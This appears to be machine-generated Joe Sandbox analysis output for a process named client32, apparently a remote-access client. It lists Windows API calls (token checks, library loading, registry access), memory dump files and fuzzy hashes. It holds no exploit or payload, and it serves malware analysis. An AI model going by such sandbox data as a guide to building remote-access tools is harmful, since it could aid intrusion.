                                                                                                                        • Instruction Fuzzy Hash: 5911A135A4021DABEB14CB94CC42FEDF378AB48B04F1040D5E724AB1C0E7B02A08CB65
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
                                                                                                                          • Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,74DEF550,?,00000000), ref: 1109DC58
                                                                                                                          • Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
                                                                                                                          • Part of subcall function 1109DC20: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00470EF8,00470EF8,00470EF8,00470EF8,00470EF8,00470EF8,00470EF8,111EAB1C,?,00000001,00000001), ref: 1109DCA0
                                                                                                                          • Part of subcall function 1109DC20: EqualSid.ADVAPI32(?,00470EF8,?,00000001,00000001), ref: 1109DCB3
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2256153495-0
                                                                                                                        • Opcode ID: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
                                                                                                                        • Instruction ID: c89a6c7b331b2a9e52fe7b246e4b03132f6c449d5caf40a75acaa97b60e2562d
                                                                                                                        • Opcode Fuzzy Hash: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
                                                                                                                        • Instruction Fuzzy Hash: 71F08CB5E42319EFC705DFE5D8849AEFBB8AF09308750847DEA1AC3204D631DA009F61
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSection.KERNEL32(111EC8B8,7E4636A2,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C6E4
                                                                                                                        • EnterCriticalSection.KERNEL32(111EC8B8,7E4636A2,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C700
                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC8B8,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C748
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3991485460-0
                                                                                                                        • Opcode ID: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
                                                                                                                        • Instruction ID: 5cbfd62ab707a984bc8f9840cb1ce5c13d1e9dd1c8f4cb6af8017bccb6afb893
                                                                                                                        • Opcode Fuzzy Hash: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
                                                                                                                        • Instruction Fuzzy Hash: DC117375A01B25AFE7029F89CE88F9EFBE8EB45624F40416AF911A3740D73498008B91
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068012
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: ??CTL32.DLL
                                                                                                                        • API String ID: 1029625771-2984404022
                                                                                                                        • Opcode ID: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
                                                                                                                        • Instruction ID: 32b9202a4fc65b1dacbe7aa8c831b48159e18a8703659cb8720647e729342126
                                                                                                                        • Opcode Fuzzy Hash: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
                                                                                                                        • Instruction Fuzzy Hash: C431D371A04655DFE711CF59DC40F5AF7E8FB45724F0086BAE9199B380E731A900CB91
                                                                                                                        APIs
                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 110267DD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DriveType
                                                                                                                        • String ID: ?:\
                                                                                                                        • API String ID: 338552980-2533537817
                                                                                                                        • Opcode ID: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
                                                                                                                        • Instruction ID: 38449473f5ed5767ddcbcf892a2d2af3f0dceeb725c671958e56149c4f091727
                                                                                                                        • Opcode Fuzzy Hash: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
                                                                                                                        • Instruction Fuzzy Hash: 6DF0B460C043D63AEB22CE60A84459ABFD85F062A8F54C8DEDCDC46941E1B6E188C791
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 110EAE90: RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,7E4636A2), ref: 110EAE9D
                                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,7E4636A2), ref: 110EAEEC
                                                                                                                          • Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B
                                                                                                                        Strings
                                                                                                                        • Error %d Opening regkey %s, xrefs: 110EAEFA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenwvsprintf
                                                                                                                        • String ID: Error %d Opening regkey %s
                                                                                                                        • API String ID: 1772833024-3994271378
                                                                                                                        • Opcode ID: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
                                                                                                                        • Instruction ID: 09eb28a66f6e9341cb3e48657c7c8114af41280c10e95afb1c39da68eab11178
                                                                                                                        • Opcode Fuzzy Hash: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
                                                                                                                        • Instruction Fuzzy Hash: BFE092BA701319BFD210D65A9C88FABBB5DDBC96A4F014025FA0897341D971EC4082B0
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 1110C4D2
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorExitLastMessageProcess_memsetwsprintf
                                                                                                                        • String ID: ..\ctl32\Refcount.cpp
                                                                                                                        • API String ID: 4120431230-2363596943
                                                                                                                        • Opcode ID: bce583019a6b6f5728b65a1f3c6ed1eb728a479e52f27e907b7c6efb70f27a12
                                                                                                                        • Instruction ID: fb683ad4537a29421ebad94ea8a5926084d263391e6db2c8366a4dac22183ed0
                                                                                                                        • Opcode Fuzzy Hash: bce583019a6b6f5728b65a1f3c6ed1eb728a479e52f27e907b7c6efb70f27a12
                                                                                                                        • Instruction Fuzzy Hash: D4E08C3BE4013932C1A1248A7C42FABFA5C4B92AA8F050021FD18A6211A545660181E6
                                                                                                                        APIs
                                                                                                                        • RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,7E4636A2), ref: 110EAE9D
                                                                                                                          • Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B
                                                                                                                        Strings
                                                                                                                        • Error %d closing regkey %x, xrefs: 110EAEAD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Closewvsprintf
                                                                                                                        • String ID: Error %d closing regkey %x
                                                                                                                        • API String ID: 843752472-892920262
                                                                                                                        • Opcode ID: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
                                                                                                                        • Instruction ID: 92a7a0ee5207e3186e072fae0831ab025553d10eab44dfd4ffee7659da325c5a
                                                                                                                        • Opcode Fuzzy Hash: d3fc0d82baa1ddb2271feda08d7221ea6831457fe91f5de97020d69f68cd7bd4
                                                                                                                        • Instruction Fuzzy Hash: FEE08675602152DFD335CA1EAC58F67B6D99FC9710F12456DB841D3300DB70C8418660
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(NSMTRACE,?,1102D904,Function_000261F0,0224B858,?,?,?,00000100), ref: 111429F9
                                                                                                                          • Part of subcall function 11141D10: GetModuleHandleA.KERNEL32(NSMTRACE,?), ref: 11141D2A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                        • String ID: NSMTRACE
                                                                                                                        • API String ID: 4133054770-4175627554
                                                                                                                        • Opcode ID: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
                                                                                                                        • Instruction ID: 309f5c028bc3f4bd42ffbc0ff88fedcb33e8baf52d9891cbdd74bffcbc1e2387
                                                                                                                        • Opcode Fuzzy Hash: 433502aec3a65e000fb08c2d6388570534c842de87ba222d45da2a5652d1413f
                                                                                                                        • Instruction Fuzzy Hash: 93D05E712417378BCB17AFED98953B8FBE8B70865D3340075D825D3A04EB70E0408B61
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,68598DC8), ref: 68594F78
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: psapi.dll
                                                                                                                        • API String ID: 1029625771-80456845
                                                                                                                        • Opcode ID: db31c45bf9382b5e9960c4961a9dfe3fe824b9136a4ad7c62bc5c4ee202b4110
                                                                                                                        • Instruction ID: b761ed76ea0f9ce8f81cf52a1ef79c57d507c6a42b64ba97d65a0e7c60646a59
                                                                                                                        • Opcode Fuzzy Hash: db31c45bf9382b5e9960c4961a9dfe3fe824b9136a4ad7c62bc5c4ee202b4110
                                                                                                                        • Instruction Fuzzy Hash: 36E001B1901B108F87B0CF3AA50464ABEF0BB086503118A2E949EC3A10E330A5858F84
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(psapi.dll), ref: 110259A8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
